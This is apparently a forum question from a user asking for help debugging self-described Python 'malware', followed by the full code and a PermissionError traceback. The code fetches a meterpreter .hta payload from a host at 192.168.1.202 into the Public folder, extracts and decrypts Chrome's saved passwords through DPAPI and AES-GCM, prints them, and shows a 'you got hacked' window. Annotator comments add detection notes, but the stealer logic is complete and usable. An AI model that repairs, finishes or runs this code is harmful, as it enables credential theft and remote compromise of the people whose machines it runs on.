I'm currently working on a 'malware' in Python. It should download a meterpreter payload and run it, then steal Google Chrome's saved passwords and show a message box that says 'You got hacked :)'.
I can't get it to open the payload because it reports "permission denied".
I want it to download the payload into the Public folder.
This is the code:
#CREATOR:Buckets41
#DO NOT POST WITHOUT PERMISSION
#FOR EDUCATIONAL PURPOSE ONLY
import os
import json
import base64
import sqlite3
import win32crypt
from Cryptodome.Cipher import AES
import shutil
from datetime import timezone, datetime, timedelta
import urllib.request
import PySimpleGUI as sg
# Module-level side effect: these two statements run as soon as the file is
# executed, before any of the functions below are defined.
# The first requests an .hta file over plain, unauthenticated HTTP from a
# private-range address and names a path under C:\Users\Public as the local
# destination.
# Defender note: a Python interpreter fetching an .hta file and writing under
# C:\Users\Public is a dropper pattern worth alerting on; process, network and
# file-create telemetry each expose it.
urllib.request.urlretrieve("http://192.168.1.202:8080/Y5nCh02GIAue.hta","C:\\Users\\Public\\Downloads")
# Opens the expected download location for reading (text mode, default encoding).
payload=open("C:\\Users\\Public\\Downloads\\Y5nCh02GIAue.hta")
def chrome_date_and_time(chrome_data):
    """Convert a Chrome timestamp into a naive ``datetime``.

    ``chrome_data`` is interpreted as a count of microseconds measured from
    1601-01-01 00:00. The returned value carries no tzinfo.
    """
    epoch_1601 = datetime(1601, 1, 1)
    elapsed = timedelta(microseconds=chrome_data)
    return epoch_1601 + elapsed
# Recover the key that protects Chrome's saved-login values for the current user.
# Reads %USERPROFILE%\AppData\Local\Google\Chrome\User Data\Local State as JSON,
# base64-decodes os_crypt.encrypted_key, drops the first 5 bytes and passes the
# remainder to DPAPI (CryptUnprotectData). Returns element [1] of the DPAPI result.
# Defender note: this is the browser credential-access pattern catalogued as
# ATT&CK T1555.003. A non-browser process reading "Local State" and then calling
# DPAPI is a useful detection signal, and anything running in the user's session
# can do it without elevation.
def fetching_encryption_key():
local_computer_directory_path = os.path.join(
os.environ["USERPROFILE"], "AppData", "Local", "Google", "Chrome",
"User Data", "Local State")
with open(local_computer_directory_path, "r", encoding="utf-8") as f:
local_state_data = f.read()
local_state_data = json.loads(local_state_data)
encryption_key = base64.b64decode(
local_state_data["os_crypt"]["encrypted_key"])
# The 5 leading bytes are removed without being checked.
# NOTE(review): presumably Chrome's "DPAPI" marker; confirm.
encryption_key = encryption_key[5:]
return win32crypt.CryptUnprotectData(encryption_key, None, None, None, 0)[1]
# Decrypt one password_value blob; every path returns a str.
# Primary path: bytes 3..14 of the blob are used as the AES-GCM nonce and bytes
# 15 onward as ciphertext. The last 16 bytes of the decrypted output are
# discarded before decoding with the default codec.
# NOTE(review): the first 3 bytes are skipped unchecked; presumably a version
# tag. Confirm against the blob format.
def password_decryption(password, encryption_key):
try:
iv = password[3:15]
password = password[15:]
cipher = AES.new(encryption_key, AES.MODE_GCM, iv)
return cipher.decrypt(password)[:-16].decode()
# Bare except: any failure above, including a decode error, falls through
# to the fallback below.
except:
try:
# Fallback: hand the blob, already sliced if the failure came after line 2 of
# the try body, straight to DPAPI and return the str() of the resulting value.
return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1])
except:
# Sentinel returned when both attempts fail; callers cannot tell it apart
# from a real stored value.
return "No Passwords"
# Dump every row of Chrome's saved-login table for the current user to stdout.
# Steps visible here: obtain the key, copy the profile's "Login Data" SQLite
# file to ChromePasswords.db in the current working directory, query the logins
# table, print the fields including the decrypted password, then delete the copy.
# Defender note: the copy and deletion of ChromePasswords.db are file-system
# artifacts, and a non-browser process reading "Login Data" is a detection
# signal in its own right. Credentials are written to stdout in clear text.
def main():
key = fetching_encryption_key()
db_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local",
"Google", "Chrome", "User Data", "default", "Login Data")
filename = "ChromePasswords.db"
# Works on a copy rather than the original file.
# NOTE(review): presumably because the browser holds the original open; confirm.
shutil.copyfile(db_path, filename)
db = sqlite3.connect(filename)
cursor = db.cursor()
cursor.execute(
"select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins "
"order by date_last_used")
for row in cursor.fetchall():
main_url = row[0]
login_page_url = row[1]
user_name = row[2]
decrypted_password = password_decryption(row[3], key)
date_of_creation = row[4]
last_usuage = row[5]
# Rows with neither a user name nor a decrypted value are skipped.
if user_name or decrypted_password:
print(f"Main URL: {main_url}")
print(f"Login URL: {login_page_url}")
print(f"User name: {user_name}")
print(f"Decrypted Password: {decrypted_password}")
else:
continue
# Timestamps that are falsy or equal to 86400000000 (one day in microseconds)
# are not printed.
if date_of_creation != 86400000000 and date_of_creation:
print(f"Creation date: {str(chrome_date_and_time(date_of_creation))}")
if last_usuage != 86400000000 and last_usuage:
print(f"Last Used: {str(chrome_date_and_time(last_usuage))}")
print("=" * 100)
cursor.close()
db.close()
# Best-effort removal of the working copy; any error is silently ignored.
try:
os.remove(filename)
except:
pass
# Script entry point: calls main() when the file is run directly.
# NOTE(review): indentation was lost in this listing, so it is unclear whether
# the window code below belongs inside this guard or runs unconditionally.
if __name__ == "__main__":
main()
# Builds a PySimpleGUI window titled "Buckets41" holding one text line and an
# OK button.
layout = [[sg.Text("YOU JUST GOT HACKED :)")], [sg.Button("OK")]]
window = sg.Window("Buckets41", layout)
# Blocks on window events until OK is pressed or the window is closed.
while True:
event, values = window.read()
if event == "OK" or event == sg.WIN_CLOSED:
break
window.close()
And this is the error:
Traceback (most recent call last):
File "C:\Users\tommy\Desktop\pentesting\ERROR.py", line 16, in <module>
urllib.request.urlretrieve("http://192.168.1.202:8080/Y5nCh02GIAue.hta","C:\\Users\\Public\\Downloads")
File "C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.10_3.10.496.0_x64__qbz5n2kfra8p0\lib\urllib\request.py", line 251, in urlretrieve
tfp = open(filename, 'wb')
PermissionError: [Errno 13] Permission denied: 'C:\\Users\\Public\\Downloads'
Thanks!!!